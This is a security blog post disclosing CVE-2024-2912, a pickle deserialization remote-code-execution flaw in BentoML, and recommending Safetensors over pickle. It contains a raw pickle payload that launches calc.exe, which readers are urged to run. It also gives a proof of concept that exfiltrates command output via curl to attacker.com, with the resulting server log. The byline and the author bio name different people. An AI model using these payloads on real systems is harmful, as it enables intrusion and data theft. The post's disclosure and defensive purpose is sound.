Written by Laurent Dupont

How I Discovered CVE-2024-2912: Unveiling BentoML Pickle-Based Serialization

This is the story of how I found a remote code execution vulnerability in BentoML and what it can teach you about securing your AI systems.

BentoML is a popular AI framework used to package and serve models. It makes it very simple for you to turn any model into a REST API.

As part of my usual routine, I began exploring the different methods BentoML uses to serialize and deserialize objects, especially machine learning models. AI models are essentially just objects in a program’s runtime, and in order to store or transfer these objects, we convert them into a byte format; this is called serialization. The opposite, loading such a model back into memory, is called deserialization. In Python, this is commonly done using `pickle`. This is the story of how I discovered CVE-2024-2912, how severe it is, and how `pickle` was the culprit.

What's Pickle, and Why Is It Dangerous?

For anyone unfamiliar with Python, pickle is the default serialization mechanism in the language, converting Python objects into byte streams for easy storage or transmission. While convenient, pickle is known for its inherent dangers when used with untrusted data. Deserialization through pickle allows attackers to inject arbitrary code during the unpickling process. This essentially gives them access to execute malicious code on the server where the object is being deserialized.

Just look at how simple it is. I urge you all to open a Python terminal and run this command:

    import pickle
    pickle.loads(b'\x80\x04\x95 \x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94\x8c\x06system\x94\x93\x94\x8c\x08calc.exe\x94\x85\x94R\x94.')

Let me guess: You didn’t run that code because you don’t trust me, right? Yet this is what we do all the time when loading AI models.

The models that we all download from various sources are very often pickle files, and the same risk applies if we don’t inspect or validate those files before deserializing them. Pickle is so easy to use, so intuitive, that it’s almost become a blind spot for developers, myself included, up until this point.
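As a rough illustration of what "inspecting" a pickle can look like, the sketch below uses the standard library's `pickletools.genops` to walk the opcodes of a payload and list the functions it would import, without ever loading it. The helper name `list_pickle_imports` is made up for this example, and the way it resolves `STACK_GLOBAL` (taking the two most recent string constants) is a simplifying assumption that a determined attacker could evade, so treat it as a teaching aid rather than a scanner.

```python
import pickle
import pickletools


def list_pickle_imports(payload: bytes) -> list:
    """List the "module.name" references in a pickle without loading it."""
    imports = []
    strings = []  # string constants seen so far (heuristic for STACK_GLOBAL)
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name == "GLOBAL":
            # Older protocols: arg is "module name" in a single string.
            imports.append(arg.replace(" ", ".", 1))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name are the two strings pushed just before.
            imports.append(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return imports


# The calc.exe payload from above, inspected instead of loaded.
suspicious = (b'\x80\x04\x95 \x00\x00\x00\x00\x00\x00\x00\x8c\x02nt\x94'
              b'\x8c\x06system\x94\x93\x94\x8c\x08calc.exe\x94\x85\x94R\x94.')
print(list_pickle_imports(suspicious))                               # ['nt.system']
print(list_pickle_imports(pickle.dumps({"weights": [0.1, 0.2]})))    # []
```

A plain data pickle references no globals at all, so any entry in this list, and especially something like `nt.system` or `os.system`, is a strong hint that the file does more than carry data.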

The BentoML Bug

Enough theory; let’s dig into the bug I found in BentoML. I knew the AI community loved pickle, but I did not expect it to go this far!

I found some mentions of `media_type = "application/vnd.bentoml+pickle"` in BentoML. This made me wonder. Normally, when I interact with a BentoML service, I’m sending data using JSON, where the media type is `application/json`. When I’m uploading files, I use `multipart/form-data` as the media type. But it seems that BentoML has created its own media type, `application/vnd.bentoml+pickle`, and the name clearly suggests that this media type expects pickled data.
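To make the role of the media type concrete, here is a minimal sketch of how a service could refuse request bodies whose `Content-Type` is not on an explicit allowlist. This is a generic illustration and not how BentoML handles requests or how the vulnerability was patched; `ALLOWED_MEDIA_TYPES` and `is_allowed_content_type` are hypothetical names chosen for the example.

```python
# Hypothetical allowlist: only formats that carry plain data, never pickles.
ALLOWED_MEDIA_TYPES = {"application/json", "multipart/form-data"}


def is_allowed_content_type(header_value: str) -> bool:
    """Return True if the Content-Type header names an allowed media type."""
    # Drop parameters such as "; charset=utf-8" or "; boundary=...".
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in ALLOWED_MEDIA_TYPES


print(is_allowed_content_type("application/json; charset=utf-8"))   # True
print(is_allowed_content_type("application/vnd.bentoml+pickle"))    # False
```

The point of the allowlist is that the client chooses the header, so any media type the server is willing to unpickle is effectively an attacker-controlled switch.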

So, I put together this really simple proof of concept. I create a class `P` that has a `__reduce__` method. Pickle calls this method when serializing an object, and the callable and arguments it returns are what the unpickler invokes when the object is deserialized. So, I override this method to return `os.system` with a shell command, which makes the BentoML server send an HTTP request to me, the attacker, containing the output of a command executed on the server.

    import pickle, os, requests

    class P(object):
        def __reduce__(self):
            # The server's unpickler will call os.system with this command.
            return (os.system, ("curl http://attacker.com/?result=`id`",))

    # Send the pickled object using BentoML's pickle media type.
    requests.post('http://bentoml.host.com:3000/summarize', data=pickle.dumps(P()), headers={"Content-Type": "application/vnd.bentoml+pickle"})

On my attacker web server, I then receive a request showing that my attack worked and that I was able to execute commands on the server.

    [06/Feb/2024 13:41:59] "GET /?result=uid=1000(kali) HTTP/1.1" 200 -

This is, of course, merely a proof of concept. A real attacker could use the same technique to gain full access to the system and do with it whatever they please: remote code execution!
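If you want to see the mechanism without touching a server or running a shell command, the sketch below reproduces it locally with a harmless callable. It also shows the "restricting globals" pattern from the Python documentation, where `Unpickler.find_class` is overridden to refuse every import. The class names `Harmless` and `DenyAllGlobals` are illustrative, and denying everything is an assumption made for brevity; a real service would more likely allowlist a few known-safe classes or avoid pickle entirely.

```python
import io
import pickle


class Harmless:
    def __reduce__(self):
        # Called while pickling: returns (callable, args) for the unpickler to call.
        return (sorted, ([3, 1, 2],))


payload = pickle.dumps(Harmless())

# Loading does not rebuild a Harmless object; it calls sorted([3, 1, 2]).
result = pickle.loads(payload)
print(type(result).__name__, result)  # list [1, 2, 3]


class DenyAllGlobals(pickle.Unpickler):
    def find_class(self, module, name):
        # Every function or class lookup in the pickle stream passes through here.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


try:
    DenyAllGlobals(io.BytesIO(payload)).load()
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Swap `sorted` for `os.system` and the list for a shell command, and you have the proof of concept above: the loader runs whatever callable the sender picked.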

The Solution: Safetensors and Moving Beyond Pickle

Fortunately, the issue with `pickle` has been well-known for years, and alternatives have emerged to address these risks. One of the most promising solutions is Safetensors, a serialization format created specifically for safely handling machine learning models without exposing systems to the dangers of code injection through deserialization.

Safetensors is fundamentally different from pickle in how it handles data. Pickle is designed to serialize arbitrary Python objects, and its byte stream can instruct the loader to import and call any function. Safetensors restricts the file to pure data: raw tensor bytes plus a JSON header that describes each tensor’s name, data type, and shape. Because nothing in the file is ever imported or called, loading it cannot trigger code execution, which removes this class of remote code execution (RCE) vulnerability.
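To show why a data-only format leaves no room for code, here is a simplified, standard-library-only sketch modeled on the published Safetensors layout: an 8-byte little-endian header length, a JSON header with `dtype`, `shape`, and `data_offsets` per tensor, then the raw bytes. The functions `build_safetensors_like` and `read_safetensors_like` are hypothetical names for this example, the sketch skips the validation a real implementation performs, and in practice you would use the `safetensors` library itself.

```python
import json
import struct


def build_safetensors_like(tensors: dict) -> bytes:
    """tensors maps name -> (dtype string, shape list, raw bytes)."""
    header, buffer = {}, b""
    for name, (dtype, shape, raw) in tensors.items():
        header[name] = {
            "dtype": dtype,
            "shape": shape,
            "data_offsets": [len(buffer), len(buffer) + len(raw)],
        }
        buffer += raw
    header_bytes = json.dumps(header).encode("utf-8")
    # 8-byte little-endian header length, then the JSON header, then the data.
    return struct.pack("<Q", len(header_bytes)) + header_bytes + buffer


def read_safetensors_like(blob: bytes) -> dict:
    """Parse the header and slice out tensor bytes; nothing is imported or called."""
    (header_len,) = struct.unpack("<Q", blob[:8])
    header = json.loads(blob[8:8 + header_len])
    data = blob[8 + header_len:]
    tensors = {}
    for name, info in header.items():
        if name == "__metadata__":  # optional free-form string metadata
            continue
        begin, end = info["data_offsets"]
        tensors[name] = (info["dtype"], info["shape"], data[begin:end])
    return tensors


weights = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)
blob = build_safetensors_like({"layer.weight": ("F32", [2, 2], weights)})
dtype, shape, raw = read_safetensors_like(blob)["layer.weight"]
print(dtype, shape, struct.unpack("<4f", raw))
```

The reader only ever parses JSON and slices bytes. There is no equivalent of pickle's "call this function with these arguments" instruction, so a malicious file can at worst contain wrong numbers.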

This new standard isn’t just about keeping things secure; it’s about changing how we think about model serving and data serialization. Frameworks like BentoML should adopt Safetensors as their default serialization format so that we can avoid the risks and exploits associated with pickle altogether.

Conclusion: Why CVE-2024-2912 Should Be a Wake-Up Call

As someone who regularly works on penetration tests and security assessments, I can’t stress enough how important it is to think beyond convenience when designing systems that handle external data. Insecure deserialization vulnerabilities are far more common than people realize, especially in machine learning and AI platforms.

As an AI community, we need to move past unsafe serialization formats as quickly as possible. We like to think that at this point, every developer knows that pickling should not be performed on untrusted data, but that is clearly not the case. Let’s come together as a community and adopt serialization formats that are designed with security in mind, such as Safetensors, which provides a secure way to handle model storage and deployment.

CVE-2024-2912 should be a wake-up call that when it comes to security, you don’t compromise. Don’t let it be just another bug or vulnerability. I hope this will be the last insecure deserialization vulnerability I will find in AI applications, but somehow, I doubt it. Machine learning models and the libraries we use to serve them are powerful, but they can also be a gateway to serious security flaws if we aren’t careful. Let’s be vigilant about how we serialize data and remember that convenience shouldn’t come at the cost of security.

About the Author

Robbe Van Roey is a security consultant with 6 years of experience in the cybersecurity field. During this time, he has become an expert in web application and network penetration testing by responsibly disclosing vulnerabilities, engaging in bug bounty, competing in hacking competitions, and performing penetration tests. He also holds a top position on the Intigriti bug bounty platform and worked for multiple years as a hacker manager at Intigriti.